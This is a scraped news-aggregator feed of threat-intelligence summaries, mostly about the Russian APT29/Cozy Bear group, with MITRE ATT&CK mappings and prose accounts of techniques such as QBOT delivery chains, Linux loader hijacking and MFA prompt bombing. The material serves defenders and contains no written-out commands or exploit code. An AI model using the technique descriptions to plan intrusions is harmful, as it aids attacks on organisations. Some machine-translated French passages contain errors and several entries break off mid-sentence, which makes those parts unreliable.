The cases of major APT groups for May 2023 gathered from materials made public by security companies and institutions are as follows. – Agrius – Andariel – APT28 – APT29 – APT-C-36 (Blind Eagle) – Camaro Dragon – CloudWizard – Earth Longzhi (APT41) – GoldenJackal – Kimsuky – Lazarus – Lancefly – OilAlpha – Red Eyes (APT37, ScarCruft) – SideCopy – SideWinder – Transparent Tribe (APT36) – Volt Typhoon (Bronze Silhouette) ATIP_2023_May_Threat Trend Report on APT Groups_20230609 ]]> 2023-07-07T02:33:29+00:00 https://asec.ahnlab.com/en/55184/ www.secnews.physaphae.fr/article.php?IdArticle=8353225 False Threat,Prediction APT 38,GoldenJackal,GoldenJackal,APT-C-36,APT 29,APT 29,APT 37,APT 37,Guam,Guam,APT 28,APT 28,APT 41,APT 36,APT 36,APT-C-17,APT-C-17 3.0000000000000000 Soc Radar - Blog spécialisé SOC Microsoft has identified Midnight Blizzard, a Russian state-affiliated hacking group also known as APT29, as... ]]> 2023-06-27T08:30:52+00:00 https://socradar.io/credential-theft-attacks-surge-microsoft-raises-red-flag-on-midnight-blizzard-apt29/ www.secnews.physaphae.fr/article.php?IdArticle=8349658 False None APT 29 2.0000000000000000 Recorded Future - FLux Recorded Future Microsoft a détecté Une augmentation des attaques de vol d'identification menées par le groupe de pirates affilié à l'État russe souvent étiqueté comme APT29, Cozy Bear, Bearsou Nobelium.Ces attaques s'adressent aux gouvernements, aux prestataires de services informatiques, aux organisations non gouvernementales (ONG) et aux industries de la défense et de la fabrication critiques.Sous Microsoft \'s nouvelle convention de dénomination Menaces (APTS), l'entreprise appelle

---

Microsoft has detected an increase in credential-stealing attacks conducted by the Russian state-affiliated hacker group often labeled as APT29, Cozy Bear or Nobelium. These attacks are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries. Under Microsoft\'s new naming convention for advanced persistent threats (APTs), the company is calling]]> 2023-06-21T20:21:00+00:00 https://therecord.media/nobelium-hacking-group-stealing-credentials www.secnews.physaphae.fr/article.php?IdArticle=8347838 False None APT 29 2.0000000000000000 Anomali - Firm Blog Figure 1 - Diagrammes de résumé du CIO.Ces graphiques résument les CIO attachés à ce magazine et donnent un aperçu des menaces discutées. Cyber News et Intelligence des menaces banquier QBOT livré par correspondance commerciale (Publié: 17 avril 2023) Début avril 2023, un volume accru de Malspam en utilisant le détournement de fil commercial-imail a été détecté pour fournir le troin bancaire QBOT (QAKBOT, Quackbot, Pinkslipbot).Les leurres observés en anglais, en allemand, en italien et en français visaient divers pays, les trois premiers étant l'Allemagne, l'Argentine et l'Italie, dans cet ordre.Les attaquants usurpaient un nom dans la conversation détournée pour inciter la cible à ouvrir un fichier PDF ci-joint.La cible est ensuite confrontée à un bouton, à un mot de passe et à une instruction pour télécharger, déballer et exécuter un fichier de script Windows malveillant (WSF) dans une archive protégée par mot de passe.L'exécution des utilisateurs est suivie d'une désobfuscation automatisée d'un JScript contenu produisant un script PowerShell codé visant à télécharger une DLL QBOT à partir d'un site Web compromis et à l'exécuter à l'aide de RunDLL32.QBOT vole les informations d'identification, profil les systèmes pour identifier les perspectives de ciblage supplémentaire de grande valeur et vole des e-mails stockés localement pour une prolifération supplémentaire via le détournement de fil calspam. Commentaire de l'analyste: L'usurpation du nom de l'expéditeur des lettres précédentes du & lsquo; from & rsquo;Le champ peut être identifié dans cette campagne car il utilise une adresse e-mail frauduleuse de l'expéditeur différent de celle du véritable correspondant.Les utilisateurs doivent être prudents avec des archives protégées par mot de passe et des types de fichiers suspects tels que WSF.Les indicateurs de réseau et d'hôtes associés à cette campagne QBOT sont disponibles dans la plate-forme Anomali et il est conseillé aux clients de les bloquer sur leur infrastructure. mitreAtt & amp; ck: [mitre att & amp; ck] t1566 - phishing | [mitre att & amp; ck] t1204 - exécution des utilisateurs | [mitre att & amp; ck] t1207 - contrôleur de domaine voyou | [mitre att & amp; ck] t1140 - déobfuscate /Décoder des fichiers ou des informations | [mitre att & amp; ck] t1059.001: powershell | [mitre att & amp; ck] t1218.011 - Exécution par proxy binaire signée: rundll32 | [mitre att & amp; ck] t1090 - proxy | [mitre att & amp; ck] t1114.001 - collection de courriels: collection de message]]> 2023-04-18T17:14:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-employs-new-downloaders-rtm-locker-ransomware-seeks-privacy-vice-society-automated-selective-exfiltration www.secnews.physaphae.fr/article.php?IdArticle=8328981 False Ransomware,Malware,Tool,Threat APT 29,APT 29 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Russia-linked APT29 (aka Cozy Bear) threat actor has been attributed to an ongoing cyber espionage campaign targeting foreign ministries and diplomatic entities located in NATO member states, the European Union, and Africa. According to Poland\'s Military Counterintelligence Service and the CERT Polska team, the observed activity shares tactical overlaps with a cluster tracked by Microsoft as]]> 2023-04-14T18:27:00+00:00 https://thehackernews.com/2023/04/russia-linked-hackers-launches.html www.secnews.physaphae.fr/article.php?IdArticle=8327789 False Threat APT 29 2.0000000000000000 Recorded Future - FLux Recorded Future Les pirates russes affiliés à l'État ont lancé une campagne d'espionnage ciblant les ministères étrangères et les entités diplomatiques dans les pays de l'OTAN, l'Union européenne et, «dans une moindre mesure», a déclaré l'Afrique, la principale agence de cybersécurité de l'Afrique, la Pologne \\.La campagne est liée au groupe de piratage soutenu par le Kremlin, Nobelium, également connu sous le nom d'APT29 ou [Bluebravo] (https://www.recordedfuture.com/bluebravo-uses-ambassador-reure-Deploy-GraphicalNeutrino-Malware), cert.pl a déclaré dans un [rapport] (https://www.gov.pl/wEB / Baza-Wiedzy / Espionage-Campaign-liked-to-russian-Intelligence-Services) publié jeudi avec

---

Russian state-affiliated hackers have launched a spying campaign targeting foreign ministries and diplomatic entities in NATO countries, the European Union, and, “to a lesser extent,” Africa, Poland\'s top cybersecurity agency said. The campaign is linked to the Kremlin-backed hacking group Nobelium, also known as APT29 or [BlueBravo](https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware), CERT.PL said in a [report](https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services) published Thursday with]]> 2023-04-13T17:06:00+00:00 https://therecord.media/nobelium-apt29-russia-cyber-spying-campaign-targeting-nato-eu www.secnews.physaphae.fr/article.php?IdArticle=8327518 False None APT 29 2.0000000000000000 Soc Radar - Blog spécialisé SOC Advanced Persistent Threat (APT) groups are widely classified as organizations that lead “attacks on a... ]]> 2023-03-17T07:22:00+00:00 https://socradar.io/apt-profile-cozy-bear-apt29/ www.secnews.physaphae.fr/article.php?IdArticle=8319331 False Threat,Guideline APT 29,APT 29 2.0000000000000000 Recorded Future - FLux Recorded Future A Russian state-backed hacker group known as Nobelium is behind recent attempted cyberattacks on diplomatic entities and government agencies in the European Union, cybersecurity researchers say. In a campaign identified in early March, the hackers sent phishing emails with content related to diplomatic relations between Poland and the U.S., according to a report by cybersecurity]]> 2023-03-14T22:00:00+00:00 https://therecord.media/nobelium-apt29-cozy-bear-phishing-eu-ukraine www.secnews.physaphae.fr/article.php?IdArticle=8318651 False Hack APT 29 3.0000000000000000 SecurityWeek - Security News Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks. ]]> 2023-01-30T12:03:49+00:00 https://www.securityweek.com/russia-linked-apt29-uses-new-malware-in-embassy-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8305560 False Malware APT 29 2.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2022-11-17T00:00:00+00:00 https://www.globalsecuritymag.fr/Mustang-Panda-APT29-APT36-Phobos-Cobalt-Strike-Les-acteurs-emergents-de-la.html www.secnews.physaphae.fr/article.php?IdArticle=8054151 False None APT 29,APT 36 None Security Affairs - Blog Secu Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy Bear, Nobelium, and The Dukes) successfully phished a European diplomatic entity. The attack stands out for the use of the Windows Credential […] ]]> 2022-11-10T10:41:13+00:00 https://securityaffairs.co/wordpress/138322/apt/apt29-windows-credential-roaming.html www.secnews.physaphae.fr/article.php?IdArticle=7923274 False None APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-11-09T19:17:00+00:00 https://thehackernews.com/2022/11/apt29-exploited-windows-feature-to.html www.secnews.physaphae.fr/article.php?IdArticle=7905523 False None APT 29 None Mandiant - Blog Sécu de Mandiant historique ]]> 2022-11-08T15:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming www.secnews.physaphae.fr/article.php?IdArticle=8377408 False None APT 29,APT 29 4.0000000000000000 CISCO Talos - Cisco Research blog By Abhishek Singh.BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.  A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge.  Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit.  Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.  The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages, irrespective of whether a threat actor is impersonating a C-level executive or any employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC. Business email compromise (BEC) is one of the most financially damaging online crimes. As per the internet crime 221 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollars loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC from the simplistic through machine learning (ML) approaches. Policy-based detection The first place to start is with policy-based detection as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email. ]]> 2022-10-18T08:41:18+00:00 http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html www.secnews.physaphae.fr/article.php?IdArticle=7540074 False Threat,Medical,Cloud APT 38,APT 19,APT 29,APT 10,APT 37,Uber,APT 15,Yahoo None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | ]]> 2022-08-30T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-first-real-life-video-spoofing-attack-magicweb-backdoors-via-non-standard-key-identifier-lockbit-ransomware-blames-victim-for-ddosing-back-and-more www.secnews.physaphae.fr/article.php?IdArticle=6626943 False Ransomware,Hack,Tool,Vulnerability,Threat,Guideline,Cloud APT 29,APT 37,LastPass None Global Security Mag - Site de news francais Malwares]]> 2022-08-26T10:36:26+00:00 http://www.globalsecuritymag.fr/Le-groupe-APT29-continue-de-cibler,20220826,129187.html www.secnews.physaphae.fr/article.php?IdArticle=6541176 False None APT 29 None Security Affairs - Blog Secu Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments.  The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […] ]]> 2022-08-25T17:11:38+00:00 https://securityaffairs.co/wordpress/134838/apt/nobelium-magicweb-tool.html www.secnews.physaphae.fr/article.php?IdArticle=6524118 False Malware,Threat APT 29 None Bleeping Computer - Magazine Américain 2022-08-25T12:36:49+00:00 https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/ www.secnews.physaphae.fr/article.php?IdArticle=6523204 False Malware APT 29 3.0000000000000000 SecurityWeek - Security News 2022-08-25T10:16:06+00:00 https://www.securityweek.com/microsoft-details-new-post-compromise-malware-used-russian-cyberspies www.secnews.physaphae.fr/article.php?IdArticle=6518394 False Malware,Tool APT 29 None Security Affairs - Blog Secu Russia-linked APT group Cozy Bear continues to target Microsoft 365 accounts in NATO countries for cyberespionage purposes. Mandiant researchers reported that the Russia-linked Cozy Bear cyberespionage group (aka APT29, CozyDuke, and Nobelium), has targeted Microsoft 365 accounts in espionage campaigns. The experts pointed out that APT29 devised new advanced tactics, techniques, and procedures to evade detection. […] ]]> 2022-08-19T23:20:33+00:00 https://securityaffairs.co/wordpress/134609/apt/cozy-bear-targets-microsoft-365-users.html www.secnews.physaphae.fr/article.php?IdArticle=6422306 False None APT 29 None Bleeping Computer - Magazine Américain 2022-08-19T11:10:55+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-abuse-azure-services-to-hack-microsoft-365-users/ www.secnews.physaphae.fr/article.php?IdArticle=6415346 False Hack APT 29 None Mandiant - Blog Sécu de Mandiant Parrainé par le Foreign Intelligence Service (SVR).Mandiant continue d'identifier les opérations APT29 ciblant les intérêts des États-Unis et les pays des États-Unis et ceux des pays de l'OTAN et des pays partenaires.Malgré la publication de multiples opérations APT29, ils continuent d'être extrêmement prolifiques.En 2022, APT29 s'est concentré sur les organisations responsables de l'influence et de l'élaboration de la politique étrangère des pays de l'OTAN.Cela a inclus plusieurs cas où APT29 a revisité les victimes qu'ils avaient compromis des années

---

APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). Mandiant continues to identify APT29 operations targeting the United States\' (US) interests, and those of NATO and partner countries. Despite the publicization of multiple APT29 operations, they continue to be extremely prolific. In 2022, APT29 has focused on organizations responsible for influencing and crafting the foreign policy of NATO countries. This has included multiple instances where APT29 revisited victims they had compromised years]]> 2022-08-18T09:00:00+00:00 https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft www.secnews.physaphae.fr/article.php?IdArticle=8377438 False None APT 29,APT 29 4.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware (published: July 21, 2022) Intezer researchers discovered a new Linux malware called Lightning Framework (Lightning). It is a modular framework able to install multiple types of rootkits and to run various plugins. Lightning has passive and active capabilities for communication with the threat actor, including opening up SSH service via an OpenSSH daemon, and a polymorphic command and control (C2) configuration. Lightning is a newly discovered threat, and there is no information about its use in the wild and the actors behind it. Analyst Comment: Defenders should block known Lightning indicators. Monitor for file creation based on the Lightning naming convention. MITRE ATT&CK: [MITRE ATT&CK] Logon Scripts - T1037 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140 | [MITRE ATT&CK] Hide Artifacts - T1564 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Indicator Removal on Host - T1070 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Network Service Scanning - T1046 | [MITRE ATT&CK] Network Sniffing - T1040 | [MITRE ATT&CK] System Information Discovery - T1082 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Standard Non-Application Layer Protocol - T1095 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 Tags: Lightning Framework, Linux, Lightning.Downloader, Lightning.Core, Typosquatting, Masquerading, Timestomping, Port:33229 Google Ads Lead to Major Malvertising Campaign (published: July 20, 2022) Malwarebytes researchers discovered a malvertising campaign abusing Google Search advertisements for popular keywords such as “amazon,” “fac]]> 2022-07-26T17:10:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-abuses-google-drive-api-complex-lightning-framework-targets-linux-google-ads-hide-fraudulent-redirects-and-more www.secnews.physaphae.fr/article.php?IdArticle=5953922 False Malware,Tool,Threat,Guideline APT 29 None IT Security Guru - Blog Sécurité 2022-07-21T10:13:51+00:00 https://www.itsecurityguru.org/2022/07/21/russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=russian-adversaries-target-google-drive-and-dropbox-in-latest-campaign www.secnews.physaphae.fr/article.php?IdArticle=5853101 False Malware,Threat APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-07-19T21:03:48+00:00 https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html www.secnews.physaphae.fr/article.php?IdArticle=5827734 False None APT 29 None Security Affairs - Blog Secu Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […] ]]> 2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html www.secnews.physaphae.fr/article.php?IdArticle=5825713 False Threat APT 29 None Global Security Mag - Site de news francais Malwares]]> 2022-07-19T11:00:58+00:00 http://www.globalsecuritymag.fr/Les-pirates-russes-APT29-utilisent,20220719,128061.html www.secnews.physaphae.fr/article.php?IdArticle=5824317 False None APT 29 None CyberScoop - scoopnewsgroup.com special Cyber APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said. ]]> 2022-07-19T10:00:00+00:00 https://www.cyberscoop.com/apt29-google-drive-malware-spearphishing/ www.secnews.physaphae.fr/article.php?IdArticle=5823767 False None APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | ]]> 2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more www.secnews.physaphae.fr/article.php?IdArticle=5664956 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching APT 29 None The Register - Site journalistique Anglais 2022-07-06T05:27:10+00:00 https://go.theregister.com/feed/www.theregister.com/2022/07/06/brc4_state_sponsored_apt29/ www.secnews.physaphae.fr/article.php?IdArticle=5573916 False Malware,Tool,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada. Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list. MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm]]> 2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more www.secnews.physaphae.fr/article.php?IdArticle=4573852 False Ransomware,Malware,Tool,Vulnerability,Threat APT 29,APT 28 3.0000000000000000 knowbe4 - cybersecurity services Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages.]]> 2022-05-05T13:08:59+00:00 https://blog.knowbe4.com/cozy-bear-goes-typosquatting www.secnews.physaphae.fr/article.php?IdArticle=4548962 False Threat APT 29 None TechRepublic - Security News US 2022-05-03T15:43:28+00:00 https://www.techrepublic.com/article/russian-hacker-group-apt29-targeting-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=4538684 False None APT 29 None SecurityWeek - Security News 2022-05-03T10:08:45+00:00 https://www.securityweek.com/russian-cyberspies-target-diplomats-new-malware www.secnews.physaphae.fr/article.php?IdArticle=4537052 False Malware APT 29 None Mandiant - Blog Sécu de Mandiant UPDATE (November 2022): We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29. Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer]]> 2022-05-02T09:30:00+00:00 https://www.mandiant.com/resources/blog/unc3524-eye-spy-email www.secnews.physaphae.fr/article.php?IdArticle=8377467 False Tool,Threat APT 29 2.0000000000000000 Security Affairs - Blog Secu 2022-05-02T05:34:39+00:00 https://securityaffairs.co/wordpress/130787/apt/apt29-targets-diplomats.html www.secnews.physaphae.fr/article.php?IdArticle=4531546 False None APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-05-02T04:40:01+00:00 https://thehackernews.com/2022/05/russian-hackers-targeting-diplomatic.html www.secnews.physaphae.fr/article.php?IdArticle=4532409 False Threat APT 29 None Mandiant - Blog Sécu de Mandiant Parrainé par le Foreign Intelligence Service (SVR).Le ciblage diplomatique centré sur ce récent

---

Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29\'s efforts to evade detection through retooling and abuse of Atlassian\'s Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent]]> 2022-04-28T12:00:00+00:00 https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns www.secnews.physaphae.fr/article.php?IdArticle=8377468 False Malware APT 29,APT 29 4.0000000000000000 Mandiant - Blog Sécu de Mandiant Solarwinds Compromis en décembre 2020 , est attribuable à APT29. Cette conclusion correspond aux instructions d'attribution précédemment faites par le u.s.Gouvernement que le compromis de la chaîne d'approvisionnement de Solarwinds a été réalisé par APT29, un groupe d'espionnage basé en Russie évalué comme parrainé par le Russian Foreign Intelligence Service (SVR).Notre évaluation est basée sur des données de première main recueillies par Mandiant et est le résultat d'une comparaison et d'une revue approfondies de UNC2452 et de notre ]]> 2022-04-27T09:00:00+00:00 https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29 www.secnews.physaphae.fr/article.php?IdArticle=8377472 False None APT 29,APT 29,Solardwinds 3.0000000000000000 knowbe4 - cybersecurity services Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request.]]> 2022-04-18T12:42:15+00:00 https://blog.knowbe4.com/being-annoying-as-a-social-engineering-approach www.secnews.physaphae.fr/article.php?IdArticle=4470685 False None APT 29,APT 29 None Schneier on Security - Chercheur Cryptologue Américain increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ...]]> 2022-04-01T11:12:27+00:00 https://www.schneier.com/blog/archives/2022/04/bypassing-two-factor-authentication.html www.secnews.physaphae.fr/article.php?IdArticle=4378460 False Threat APT 29 None Ars Technica - Risk Assessment Security Hacktivism 2022-03-19T10:45:49+00:00 https://arstechnica.com/?p=1842163 www.secnews.physaphae.fr/article.php?IdArticle=4308724 False Ransomware APT 29 None Fortinet ThreatSignal - Harware Vendor 2022-03-15T13:20:59+00:00 https://fortiguard.fortinet.com/threat-signal-report/4450 www.secnews.physaphae.fr/article.php?IdArticle=4287368 True Malware,Threat APT 29 None Anomali - Firm Blog Endnotes [1] “Attack on Ukrainian Government 